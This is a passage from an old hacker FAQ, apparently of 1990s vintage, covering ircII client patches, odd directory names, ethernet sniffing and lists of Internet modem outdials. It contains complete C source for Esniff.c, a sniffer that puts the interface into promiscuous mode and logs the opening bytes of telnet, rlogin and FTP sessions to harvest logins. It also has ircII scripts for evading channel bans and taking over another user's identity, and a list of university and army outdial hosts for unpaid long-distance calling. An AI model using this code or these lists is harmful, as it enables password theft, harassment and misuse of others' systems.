  917. 17. How do I modify the IRC client to hide my real username?
  918.  
  919. Note: This FAQ answer was written by someone else, but I do not know who.
  920.       If you know who originally wrote this, please e-mail me.
  921.  
  922.  -- BEGIN QUOTED TEXT --
  923.  
  924. Applying these changes to the source code for your ircII client and
  925. recompiling gives you a new ircII command: /NEWUSER.  This new command
  926. can be used as follows:
  927.  
  928.  *   /NEWUSER <new_username> [new_IRCNAME]
  929.  *       <new_username> is a new username to use and is required
  930.  *       [new_IRCNAME] is a new IRCNAME string to use and is optional
  931.  *   This will disconnect you from your server and reconnect using
  932.  *     the new information given.  You will rejoin all channel you
  933.  *     are currently on and keep your current nickname.
  934.  
  935. The effect is basically changing your username/IRCname on the fly.
  936. Although you are disconnected from your server and reconnected, the
  937. ircII client is never exited, thus keeping all your state information
  938. and aliases intact.  This is ideal for bots that wish to be REALLY
  939. obnoxious in ban evasion. ;)
  940.  
  941. As this is now a new command in ircII, it can be used in scripts. Be
  942. aware that the reconnect associated with the NEWUSER command takes time,
  943. so TIMER any commands that must immediately follow the NEWUSER. For
  944. example... ban evasion made easy (but beware infinite reconnects when
  945. your site is banned):
  946.  
  947. on ^474 * {
  948.   echo *** Banned from channel $1
  949.   if ($N == [AnnMurray]) {
  950.     nick $randomstring
  951.     join $1
  952.     } {
  953.     nick AnnMurray
  954.     newuser $randomstring
  955.     timer 5 join $1
  956.     }
  957.   }
  958.  
  959. Or just to be annoying... a /BE <nickname> alias that will assume a
  960. person's username and IRCNAME:
  961.  
  962. alias be {
  963.   ^on ^311 * {
  964.     ^on 311 -*
  965.     newuser $2 $5-
  966.     }
  967.   whois $0
  968.   }
  969.  
  970. Now... in order to add this command to your ircII client, get the latest
  971. client source (or whatever client source you are using).  Cd into the
  972. source directory and edit the file "edit.c".  Make the following
  973. changes:
  974.  
  975. Locate the line which reads:
  976. extern  void    server();
  977.  
  978. Insert the following line after it:
  979. static  void    newuser();
  980.  
  981. This pre-defines a new function "newuser()" that we'll add later.
  982.  
  983.  
  984. Now, locate the line which reads:
  985. ."NAMES",        "NAMES",        funny_stuff,            0,
  986.  
  987. Insert the following line after it:
  988. ."NEWUSER",      NULL,           newuser,                0,
  989.  
  990. This adds a new command NEWUSER to the list of valid IRCII commands, and
  991. tells it to call our new function newuser() to perform it.
  992.  
  993.  
  994. Finally, go the bottom of the file and add the following code as our new
  995. function "newuser()":
  996.  
  997. /*
  998.  * newuser: the /NEWUSER command.  Added by Hendrix
  999.  *   Parameters as follows:
  1000.  *     /NEWUSER <new_username> [new_IRCNAME]
  1001.  *       <new_username> is a new username to use and is required
  1002.  *       [new_IRCNAME] is a new IRCNAME string to use and is optional
  1003.  *   This will disconnect you from your server and reconnect using
  1004.  *     the new information given.  You will rejoin all channels you
  1005.  *     are currently on and keep your current nickname.
  1006.  */
  1007.  
  1008. static void    newuser(command, args)
  1009. char    *command,
  1010. .*args;
  1011. {
  1012. .char    *newuname;
  1013.  
  1014. .if (newuname = next_arg(args, &args))
  1015. .{
  1016. ..strmcpy(username, newuname, NAME_LEN);
  1017. ..if (*args)
  1018. ...strmcpy(realname, args, REALNAME_LEN);
  1019. ..say("Reconnecting to server...");
  1020. ..close_server(from_server);
  1021. ..if (connect_to_server(server_list[from_server].name,
  1022. ..      server_list[from_server].port, primary_server) != -1)
  1023. ..{
  1024. ...change_server_channels(primary_server, from_server);
  1025. ...set_window_server(-1, from_server, 1);
  1026. ..}
  1027. ..else
  1028. ...say("Unable to reconnect. Use /SERVER to connect.");
  1029. .}
  1030. .else
  1031. ..say("You must specify a username and, optionally, an IRCNAME");
  1032. }
  1033.  
  1034.  -- END QUOTED TEXT --
  1035.  
  1036. /NEWUSER will not hide you from a CTCP query.  To do that, modify ctcp.c
  1037. as shown in the following diff and set an environment variable named
  1038. CTCPFINGER with the information you would like to display when queried.
  1039.  
  1040. *** ctcp.old
  1041. --- ctcp.c
  1042. ***************
  1043. *** 334 ****
  1044. !       char    c;
  1045. --- 334 ---
  1046. !       char    c, *fing;
  1047. ***************
  1048. *** 350,354 ****
  1049. !               if (pwd = getpwuid(uid))
  1050. ..{
  1051. ...char    *tmp;
  1052. --- 350,356 ----
  1053. !               if (fing = getenv("CTCPFINGER"))
  1054. !                       send_ctcp_reply(from, ctcp->name, fing, diff, c);
  1055. !               else if (pwd = getpwuid(uid))
  1056. ..{
  1057. ...char    *tmp;
  1058.  
  1059.  
  1060. 18. How to I change to directories with strange characters in them?
  1061.  
  1062. These directories are often used by people trying to hide information,
  1063. most often warez (commercial software).
  1064.  
  1065. There are several things you can do to determine what these strange
  1066. characters are.  One is to use the arguments to the ls command that
  1067. cause ls to give you more information:
  1068.  
  1069. From the man page for ls:
  1070.  
  1071.     -F   Causes directories to be marked with a trailing ``/'',
  1072. . executable files to be marked with a trailing ``*'', and
  1073. . symbolic links to be marked with a trailing ``@'' symbol.
  1074.  
  1075.     -q   Forces printing of non-graphic characters in filenames as the
  1076. . character ``?''.
  1077.  
  1078.     -b   Forces printing of non-graphic characters in the \ddd
  1079. . notation, in octal.
  1080.  
  1081. Perhaps the most useful tool is to simply do an "ls -al filename" to
  1082. save the directory of the remote ftp site as a file on your local
  1083. machine.  Then you can do a "cat -t -v -e filename" to see exactly
  1084. what those bizarre little characters are.
  1085.  
  1086. From the man page for cat:
  1087.  
  1088.     -v  Causes non-printing characters (with the exception of tabs,
  1089. .newlines, and form feeds) to be displayed.  Control characters
  1090. .are displayed as ^X (<Ctrl>x), where X is the key pressed with
  1091. .the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The
  1092. .<Del> character (octal 0177) is printed as ^?.  Non-ASCII
  1093. .characters (with the high bit set) are printed as M -x, where
  1094. .x is the character specified by the seven low order bits.
  1095.  
  1096.     -t  Causes tabs to be printed as ^I and form feeds as ^L.  This
  1097. .option is ignored if the -v option is not specified.
  1098.  
  1099.     -e  Causes a ``$'' character to be printed at the end of each line
  1100. .(prior to the new-line).  This option is ignored if the -v
  1101. .option is not set.
  1102.  
  1103. If the directory name includes a <SPACE> or a <TAB> you will need to
  1104. enclose the entire directory name in quotes.  Example:
  1105.  
  1106. cd "..<TAB>"
  1107.  
  1108. On an IBM-PC, you may enter these special characters by holding down
  1109. the <ALT> key and entering the decimal value of the special character
  1110. on your numeric keypad.  When you release the <ALT> key, the special
  1111. character should appear on your screen.  An ASCII chart can be very
  1112. helpful.
  1113.  
  1114. Sometimes people will create directories with some of the standard
  1115. stty control characters in them, such as ^Z (suspend) or ^C (intr).
  1116. To get into those directories, you will first need to user stty to
  1117. change the control character in question to another character.
  1118.  
  1119. From the man page for stty:
  1120.  
  1121.     Control assignments
  1122.  
  1123.     control-character C
  1124.                       Sets control-character to C, where control-character is
  1125.                       erase, kill, intr (interrupt), quit, eof, eol, swtch
  1126.                       (switch), start, stop or susp.
  1127.  
  1128.                       start and stop are available as possible control char-
  1129.                       acters for the control-character C assignment.
  1130.  
  1131.                       If C is preceded by a caret (^) (escaped from the
  1132.                       shell), then the value used is the corresponding con-
  1133.                       trol character (for example, ^D is a <Ctrl>d; ^? is
  1134.                       interpreted as DELETE and ^- is interpreted as unde-
  1135.                       fined).
  1136.  
  1137. Use the stty -a command to see your current stty settings, and to
  1138. determine which one is causing you problems.
  1139.  
  1140.  
  1141. 19. What is ethernet sniffing?
  1142.  
  1143. Ethernet sniffing is listening (with software) to the raw ethernet
  1144. device for packets that interest you.  When your software sees a
  1145. packet that fits certain criteria, it logs it to a file.  The most
  1146. common criteria for an interesting packet is one that contains words
  1147. like "login" or "password."
  1148.  
  1149. Many ethernet sniffers are available, here are a few that may be on
  1150. your system now:
  1151.  
  1152. OS              Sniffer
  1153. ~~              ~~~~~~~
  1154. 4.3/4.4 BSD     tcpdump            /* Available via anonymous ftp           */
  1155. FreeBSD         tcpdump            /* Available via anonymous ftp at        */
  1156.                                    /* gatekeeper.dec.com
  1157.                     /* /.0/BSD/FreeBSD/FreeBSD-current/src/contrib/tcpdump/ */
  1158. NetBSD          tcpdump            /* Available via anonymous ftp at        */
  1159.                                    /* gatekeeper.dec.com
  1160.                              /* /.0/BSD/NetBSD/NetBSD-current/src/usr.sbin/ */
  1161. DEC Unix        tcpdump            /* Available via anonymous ftp           */
  1162. DEC Ultrix      tcpdump            /* Available via anonymous ftp           */
  1163. HP/UX           nettl  (monitor)
  1164.               & netfmt (display)
  1165.                 nfswatch           /* Available via anonymous ftp           */
  1166. Linux           tcpdump            /* Available via anonymous ftp at        */
  1167.                                    /* sunsite.unc.edu                       */
  1168.                                    /* /pub/Linux/system/Network/management/ */
  1169. SGI Irix        nfswatch           /* Available via anonymous ftp           */
  1170.                 Etherman
  1171.                 tcpdump            /* Available via anonymous ftp           */
  1172. Solaris         snoop
  1173.                 tcpdump
  1174. SunOS           etherfind
  1175.                 nfswatch           /* Available via anonymous ftp           */
  1176.                 tcpdump            /* Available via anonymous ftp           */
  1177. DOS             ETHLOAD            /* Available via anonymous ftp as        */
  1178.                                    /* ethld104.zip                          */
  1179.                 The Gobbler        /* Available via anonymous ftp           */
  1180.                 LanPatrol
  1181.                 LanWatch
  1182. ..Netmon
  1183.                 Netwatch
  1184.                 Netzhack           /* Available via anonymous ftp at        */
  1185.                                    /* mistress.informatik.unibw-muenchen.de */
  1186.                                    /* /pub/netzhack.mac                     */
  1187. Macintosh       Etherpeek
  1188.  
  1189. Here is source code for a sample ethernet sniffer:
  1190.  
  1191. /* Esniff.c */
  1192.  
  1193. #include <stdio.h>
  1194. #include <ctype.h>
  1195. #include <string.h>
  1196.  
  1197. #include <sys/time.h>
  1198. #include <sys/file.h>
  1199. #include <sys/stropts.h>
  1200. #include <sys/signal.h>
  1201. #include <sys/types.h>
  1202. #include <sys/socket.h>
  1203. #include <sys/ioctl.h>
  1204.  
  1205. #include <net/if.h>
  1206. #include <net/nit_if.h>
  1207. #include <net/nit_buf.h>
  1208. #include <net/if_arp.h>
  1209.  
  1210. #include <netinet/in.h>
  1211. #include <netinet/if_ether.h>
  1212. #include <netinet/in_systm.h>
  1213. #include <netinet/ip.h>
  1214. #include <netinet/udp.h>
  1215. #include <netinet/ip_var.h>
  1216. #include <netinet/udp_var.h>
  1217. #include <netinet/in_systm.h>
  1218. #include <netinet/tcp.h>
  1219. #include <netinet/ip_icmp.h>
  1220.  
  1221. #include <netdb.h>
  1222. #include <arpa/inet.h>
  1223.  
  1224. #define ERR stderr
  1225.  
  1226. char    *malloc();
  1227. char    *device,
  1228.         *ProgName,
  1229.         *LogName;
  1230. FILE    *LOG;
  1231. int     debug=0;
  1232.  
  1233. #define NIT_DEV     "/dev/nit"
  1234. #define CHUNKSIZE   4096        /* device buffer size */
  1235. int     if_fd = -1;
  1236. int     Packet[CHUNKSIZE+32];
  1237.  
  1238. void Pexit(err,msg)
  1239. int err; char *msg;
  1240. { perror(msg);
  1241.   exit(err); }
  1242.  
  1243. void Zexit(err,msg)
  1244. int err; char *msg;
  1245. { fprintf(ERR,msg);
  1246.   exit(err); }
  1247.  
  1248. #define IP          ((struct ip *)Packet)
  1249. #define IP_OFFSET   (0x1FFF)
  1250. #define SZETH       (sizeof(struct ether_header))
  1251. #define IPLEN       (ntohs(ip->ip_len))
  1252. #define IPHLEN      (ip->ip_hl)
  1253. #define TCPOFF      (tcph->th_off)
  1254. #define IPS         (ip->ip_src)
  1255. #define IPD         (ip->ip_dst)
  1256. #define TCPS        (tcph->th_sport)
  1257. #define TCPD        (tcph->th_dport)
  1258. #define IPeq(s,t)   ((s).s_addr == (t).s_addr)
  1259.  
  1260. #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
  1261.  
  1262. #define MAXBUFLEN  (128)
  1263. time_t  LastTIME = 0;
  1264.  
  1265. struct CREC {
  1266.      struct CREC *Next,
  1267.                  *Last;
  1268.      time_t  Time;              /* start time */
  1269.      struct in_addr SRCip,
  1270.                     DSTip;
  1271.      u_int   SRCport,           /* src/dst ports */
  1272.              DSTport;
  1273.      u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
  1274.      u_int   Length;            /* current data length */
  1275.      u_int   PKcnt;             /* # pkts */
  1276.      u_long  LASTseq;
  1277. };
  1278.  
  1279. struct CREC *CLroot = NULL;
  1280.  
  1281. char *Symaddr(ip)
  1282. register struct in_addr ip;
  1283. { register struct hostent *he =
  1284.       gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
  1285.  
  1286.   return( (he)?(he->h_name):(inet_ntoa(ip)) );
  1287. }
  1288.  
  1289. char *TCPflags(flgs)
  1290. register u_char flgs;
  1291. { static char iobuf[8];
  1292. #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
  1293.  
  1294.   SFL(0,TH_FIN, 'F');
  1295.   SFL(1,TH_SYN, 'S');
  1296.   SFL(2,TH_RST, 'R');
  1297.   SFL(3,TH_PUSH,'P');
  1298.   SFL(4,TH_ACK, 'A');
  1299.   SFL(5,TH_URG, 'U');
  1300.   iobuf[6]=0;
  1301.   return(iobuf);
  1302. }
  1303.  
  1304. char *SERVp(port)
  1305. register u_int port;
  1306. { static char buf[10];
  1307.   register char *p;
  1308.  
  1309.    switch(port) {
  1310.      case IPPORT_LOGINSERVER: p="rlogin"; break;
  1311.      case IPPORT_TELNET:      p="telnet"; break;
  1312.      case IPPORT_SMTP:        p="smtp"; break;
  1313.      case IPPORT_FTP:         p="ftp"; break;
  1314.      default: sprintf(buf,"%u",port); p=buf; break;
  1315.    }
  1316.    return(p);
  1317. }
  1318.  
  1319. char *Ptm(t)
  1320. register time_t *t;
  1321. { register char *p = ctime(t);
  1322.   p[strlen(p)-6]=0; /* strip " YYYY\n" */
  1323.   return(p);
  1324. }
  1325.  
  1326. char *NOWtm()
  1327. { time_t tm;
  1328.   time(&tm);
  1329.   return( Ptm(&tm) );
  1330. }
  1331.  
  1332. #define MAX(a,b) (((a)>(b))?(a):(b))
  1333. #define MIN(a,b) (((a)<(b))?(a):(b))
  1334.  
  1335. /* add an item */
  1336. #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  1337.   register struct CREC *CLtmp = \
  1338.         (struct CREC *)malloc(sizeof(struct CREC)); \
  1339.   time( &(CLtmp->Time) ); \
  1340.   CLtmp->SRCip.s_addr = SIP.s_addr; \
  1341.   CLtmp->DSTip.s_addr = DIP.s_addr; \
  1342.   CLtmp->SRCport = SPORT; \
  1343.   CLtmp->DSTport = DPORT; \
  1344.   CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  1345.   bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  1346.   CLtmp->PKcnt = 1; \
  1347.   CLtmp->Next = CLroot; \
  1348.   CLtmp->Last = NULL; \
  1349.   CLroot = CLtmp; \
  1350. }
  1351.  
  1352. register struct CREC *GET_NODE(Sip,SP,Dip,DP)
  1353. register struct in_addr Sip,Dip;
  1354. register u_int SP,DP;
  1355. { register struct CREC *CLr = CLroot;
  1356.  
  1357.   while(CLr != NULL) {
  1358.     if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
  1359.         IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
  1360.             break;
  1361.     CLr = CLr->Next;
  1362.   }
  1363.   return(CLr);
  1364. }
  1365.  
  1366. #define ADDDATA_NODE(CL,DATA,LEN) { \
  1367.  bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
  1368.  CL->Length += LEN; \
  1369. }
  1370.  
  1371. #define PR_DATA(dp,ln) {    \
  1372.   register u_char lastc=0; \
  1373.   while(ln-- >0) { \
  1374.      if(*dp < 32) {  \
  1375.         switch(*dp) { \
  1376.             case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
  1377.                         break; \
  1378.             case '\r': \
  1379.             case '\n': fprintf(LOG,"\n     : "); \
  1380.                         break; \
  1381.             default  : fprintf(LOG,"^%c", (*dp + 64)); \
  1382.                         break; \
  1383.         } \
  1384.      } else { \
  1385.         if(isprint(*dp)) fputc(*dp,LOG); \
  1386.         else fprintf(LOG,"(%d)",*dp); \
  1387.      } \
  1388.      lastc = *dp++; \
  1389.   } \
  1390.   fflush(LOG); \
  1391. }
  1392.  
  1393. void END_NODE(CLe,d,dl,msg)
  1394. register struct CREC *CLe;
  1395. register u_char *d;
  1396. register int dl;
  1397. register char *msg;
  1398. {
  1399.    fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
  1400.    fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
  1401.    fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
  1402.    fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
  1403.                         NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
  1404.    fprintf(LOG," DATA: ");
  1405.     { register u_int i = CLe->Length;
  1406.       register u_char *p = CLe->Data;
  1407.       PR_DATA(p,i);
  1408.       PR_DATA(d,dl);
  1409.     }
  1410.  
  1411.    fprintf(LOG,"\n-- \n");
  1412.    fflush(LOG);
  1413.  
  1414.    if(CLe->Next != NULL)
  1415.     CLe->Next->Last = CLe->Last;
  1416.    if(CLe->Last != NULL)
  1417.     CLe->Last->Next = CLe->Next;
  1418.    else
  1419.     CLroot = CLe->Next;
  1420.    free(CLe);
  1421. }
  1422.  
  1423. /* 30 mins (x 60 seconds) */
  1424. #define IDLE_TIMEOUT 1800
  1425. #define IDLE_NODE() { \
  1426.   time_t tm; \
  1427.   time(&tm); \
  1428.   if(LastTIME<tm) { \
  1429.      register struct CREC *CLe,*CLt = CLroot; \
  1430.      LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
  1431.      while(CLe=CLt) { \
  1432.        CLt=CLe->Next; \
  1433.        if(CLe->Time <tm) \
  1434.            END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
  1435.      } \
  1436.   } \
  1437. }
  1438.  
  1439. void filter(cp, pktlen)
  1440. register char *cp;
  1441. register u_int pktlen;
  1442. {
  1443.  register struct ip     *ip;
  1444.  register struct tcphdr *tcph;
  1445.  
  1446.  { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
  1447.  
  1448.    if(EtherType < 0x600) {
  1449.      EtherType = *(u_short *)(cp + SZETH + 6);
  1450.      cp+=8; pktlen-=8;
  1451.    }
  1452.  
  1453.    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
  1454.       return;
  1455.  }
  1456.  
  1457.     /* ugh, gotta do an alignment :-( */
  1458.  bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
  1459.  
  1460.  ip = (struct ip *)Packet;
  1461.  if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
  1462.     return;
  1463.  tcph = (struct tcphdr *)(Packet + IPHLEN);
  1464.  
  1465.  if(!( (TCPD == IPPORT_TELNET) ||
  1466.        (TCPD == IPPORT_LOGINSERVER) ||
  1467.        (TCPD == IPPORT_FTP)
  1468.    )) return;
  1469.  
  1470.  { register struct CREC *CLm;
  1471.    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
  1472.    register u_char *p = (u_char *)Packet;
  1473.  
  1474.    p += ((IPHLEN * 4) + (TCPOFF * 4));
  1475.  
  1476.  if(debug) {
  1477.   fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  1478.   fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  1479.   fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
  1480.  }
  1481.  
  1482.    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
  1483.  
  1484.       CLm->PKcnt++;
  1485.  
  1486.       if(length>0)
  1487.         if( (CLm->Length + length) < MAXBUFLEN ) {
  1488.           ADDDATA_NODE( CLm, p,length);
  1489.         } else {
  1490.           END_NODE( CLm, p,length, "DATA LIMIT");
  1491.         }
  1492.  
  1493.       if(TCPFL(TH_FIN|TH_RST)) {
  1494.           END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
  1495.       }
  1496.  
  1497.    } else {
  1498.  
  1499.       if(TCPFL(TH_SYN)) {
  1500.          ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
  1501.       }
  1502.  
  1503.    }
  1504.  
  1505.    IDLE_NODE();
  1506.  
  1507.  }
  1508.  
  1509. }
  1510.  
  1511. /* signal handler
  1512.  */
  1513. void death()
  1514. { register struct CREC *CLe;
  1515.  
  1516.     while(CLe=CLroot)
  1517.         END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
  1518.  
  1519.     fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
  1520.     fflush(LOG);
  1521.     if(LOG != stdout)
  1522.         fclose(LOG);
  1523.     exit(1);
  1524. }
  1525.  
  1526. /* opens network interface, performs ioctls and reads from it,
  1527.  * passing data to filter function
  1528.  */
  1529. void do_it()
  1530. {
  1531.     int cc;
  1532.     char *buf;
  1533.     u_short sp_ts_len;
  1534.  
  1535.     if(!(buf=malloc(CHUNKSIZE)))
  1536.         Pexit(1,"Eth: malloc");
  1537.  
  1538. /* this /dev/nit initialization code pinched from etherfind */
  1539.   {
  1540.     struct strioctl si;
  1541.     struct ifreq    ifr;
  1542.     struct timeval  timeout;
  1543.     u_int  chunksize = CHUNKSIZE;
  1544.     u_long if_flags  = NI_PROMISC;
  1545.  
  1546.     if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
  1547.         Pexit(1,"Eth: nit open");
  1548.  
  1549.     if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
  1550.         Pexit(1,"Eth: ioctl (I_SRDOPT)");
  1551.  
  1552.     si.ic_timout = INFTIM;
  1553.  
  1554.     if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
  1555.         Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
  1556.  
  1557.     timeout.tv_sec = 1;
  1558.     timeout.tv_usec = 0;
  1559.     si.ic_cmd = NIOCSTIME;
  1560.     si.ic_len = sizeof(timeout);
  1561.     si.ic_dp  = (char *)&timeout;
  1562.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1563.         Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
  1564.  
  1565.     si.ic_cmd = NIOCSCHUNK;
  1566.     si.ic_len = sizeof(chunksize);
  1567.     si.ic_dp  = (char *)&chunksize;
  1568.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1569.         Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
  1570.  
  1571.     strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
  1572.     ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
  1573.     si.ic_cmd = NIOCBIND;
  1574.     si.ic_len = sizeof(ifr);
  1575.     si.ic_dp  = (char *)𝔦
  1576.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1577.         Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
  1578.  
  1579.     si.ic_cmd = NIOCSFLAGS;
  1580.     si.ic_len = sizeof(if_flags);
  1581.     si.ic_dp  = (char *)&if_flags;
  1582.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1583.         Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
  1584.  
  1585.     if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
  1586.         Pexit(1,"Eth: ioctl (I_FLUSH)");
  1587.   }
  1588.  
  1589.     while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
  1590.         register char *bp = buf,
  1591.                       *bufstop = (buf + cc);
  1592.  
  1593.         while (bp < bufstop) {
  1594.             register char *cp = bp;
  1595.             register struct nit_bufhdr *hdrp;
  1596.  
  1597.             hdrp = (struct nit_bufhdr *)cp;
  1598.             cp += sizeof(struct nit_bufhdr);
  1599.             bp += hdrp->nhb_totlen;
  1600.             filter(cp, (u_long)hdrp->nhb_msglen);
  1601.         }
  1602.     }
  1603.     Pexit((-1),"Eth: read");
  1604. }
  1605.  /* Authorize your program, generate your own password and uncomment here */
  1606. /* #define AUTHPASSWD "EloiZgZejWyms" */
  1607.  
  1608. void getauth()
  1609. { char *buf,*getpass(),*crypt();
  1610.   char pwd[21],prmpt[81];
  1611.  
  1612.     strcpy(pwd,AUTHPASSWD);
  1613.     sprintf(prmpt,"(%s)UP? ",ProgName);
  1614.     buf=getpass(prmpt);
  1615.     if(strcmp(pwd,crypt(buf,pwd)))
  1616.         exit(1);
  1617. }
  1618.     */
  1619. void main(argc, argv)
  1620. int argc;
  1621. char **argv;
  1622. {
  1623.     char   cbuf[BUFSIZ];
  1624.     struct ifconf ifc;
  1625.     int    s,
  1626.            ac=1,
  1627.            backg=0;
  1628.  
  1629.     ProgName=argv[0];
  1630.  
  1631.  /*     getauth(); */
  1632.  
  1633.     LOG=NULL;
  1634.     device=NULL;
  1635.     while((ac<argc) && (argv[ac][0] == '-')) {
  1636.        register char ch = argv[ac++][1];
  1637.        switch(toupper(ch)) {
  1638.             case 'I': device=argv[ac++];
  1639.                       break;
  1640.             case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
  1641.                          Zexit(1,"Output file cant be opened\n");
  1642.                       break;
  1643.             case 'B': backg=1;
  1644.                       break;
  1645.             case 'D': debug=1;
  1646.                       break;
  1647.             default : fprintf(ERR,
  1648.                         "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
  1649.                             ProgName);
  1650.                       exit(1);
  1651.        }
  1652.     }
  1653.  
  1654.     if(!device) {
  1655.         if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  1656.             Pexit(1,"Eth: socket");
  1657.  
  1658.         ifc.ifc_len = sizeof(cbuf);
  1659.         ifc.ifc_buf = cbuf;
  1660.         if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
  1661.             Pexit(1,"Eth: ioctl");
  1662.  
  1663.         close(s);
  1664.         device = ifc.ifc_req->ifr_name;
  1665.     }
  1666.  
  1667.     fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
  1668.     fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
  1669.             (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
  1670.  
  1671.     if(!LOG)
  1672.         LOG=stdout;
  1673.  
  1674.     signal(SIGINT, death);
  1675.     signal(SIGTERM,death);
  1676.     signal(SIGKILL,death);
  1677.     signal(SIGQUIT,death);
  1678.  
  1679.     if(backg && debug) {
  1680.          fprintf(ERR,"[Cannot bg with debug on]\n");
  1681.          backg=0;
  1682.     }
  1683.  
  1684.     if(backg) {
  1685.         register int s;
  1686.  
  1687.         if((s=fork())>0) {
  1688.            fprintf(ERR,"[pid %d]\n",s);
  1689.            exit(0);
  1690.         } else if(s<0)
  1691.            Pexit(1,"fork");
  1692.  
  1693.         if( (s=open("/dev/tty",O_RDWR))>0 ) {
  1694.                 ioctl(s,TIOCNOTTY,(char *)NULL);
  1695.                 close(s);
  1696.         }
  1697.     }
  1698.     fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
  1699.     fflush(LOG);
  1700.  
  1701.     do_it();
  1702. }
  1703.  
  1704.  
  1705. 20. What is an Internet Outdial?
  1706.  
  1707. An Internet outdial is a modem connected to the Internet than you can
  1708. use to dial out.  Normal outdials will only call local numbers.  A GOD
  1709. (Global OutDial) is capable of calling long distance.  Outdials are an
  1710. inexpensive method of calling long distance BBS's.
  1711.  
  1712.  
  1713. 21. What are some Internet Outdials?
  1714.  
  1715. This FAQ answer is excerpted from CoTNo #5:
  1716.  
  1717. ...Internet Outdial List v3.0
  1718. ... by Cavalier and DisordeR
  1719.  
  1720.  
  1721. Introduction
  1722. ------------
  1723. There are several lists of Internet outdials floating around the net these
  1724. days. The following is a compilation of other lists, as well as v2.0 by
  1725. DeadKat(CoTNo issue 2, article 4). Unlike other lists where the author
  1726. just ripped other people and released it, we have sat down and tested
  1727. each one of these. Some of them we have gotten "Connection Refused" or
  1728. it timed out while trying to connect...these have been labeled dead.
  1729.  
  1730.  
  1731. ...   Working Outdials
  1732. ...   ----------------
  1733. ...    as of 12/29/94
  1734.  
  1735.   NPA          IP Address                   Instructions
  1736.   ---          ----------                   ------------
  1737.   215          isn.upenn.edu                modem
  1738.  
  1739.   217          dialout.cecer.army.mil       atdt x,xxxXXXXX
  1740.  
  1741.   218          modem.d.umn.edu              atdt9,xxxXXXX
  1742.  
  1743.   303          yuma.acns.colostate.edu 3020
  1744.  
  1745.   412          myriad.pc.cc.cmu.edu 2600    Press D at the prompt
  1746.  
  1747.  
  1748.   412          gate.cis.pitt.edu            tn3270,
  1749.                                             connect dialout.pitt.edu,
  1750.                                             atdtxxxXXXX
  1751.  
  1752.   413          dialout2400.smith.edu        Ctrl } gets ENTER NUMBER: xxxxxxx
  1753.  
  1754.   502          outdial.louisville.edu
  1755.  
  1756.   502          uknet.uky.edu                connect kecnet
  1757.                                             @ dial: "outdial2400 or out"
  1758.  
  1759.   602          acssdial.inre.asu.edu        atdt8,,,,,[x][yyy]xxxyyyy
  1760.  
  1761.   614          ns2400.acs.ohio-state.edu
  1762.  
  1763.   614          ns9600.acs.ohio-state.edu
  1764.  
  1765.   713          128.249.27.153               atdt x,xxxXXXX
  1766.  
  1767.   714          modem.nts.uci.edu            atdt[area]0[phone]
  1768.  
  1769.   804          ublan.virginia.edu           connect hayes, 9,,xxx-xxxx
  1770.  
  1771.   804          ublan2.acc.virginia.edu      connect telnet
  1772.                                             connect hayes
  1773.  
  1774.  
  1775.  
  1776.                              Need Password
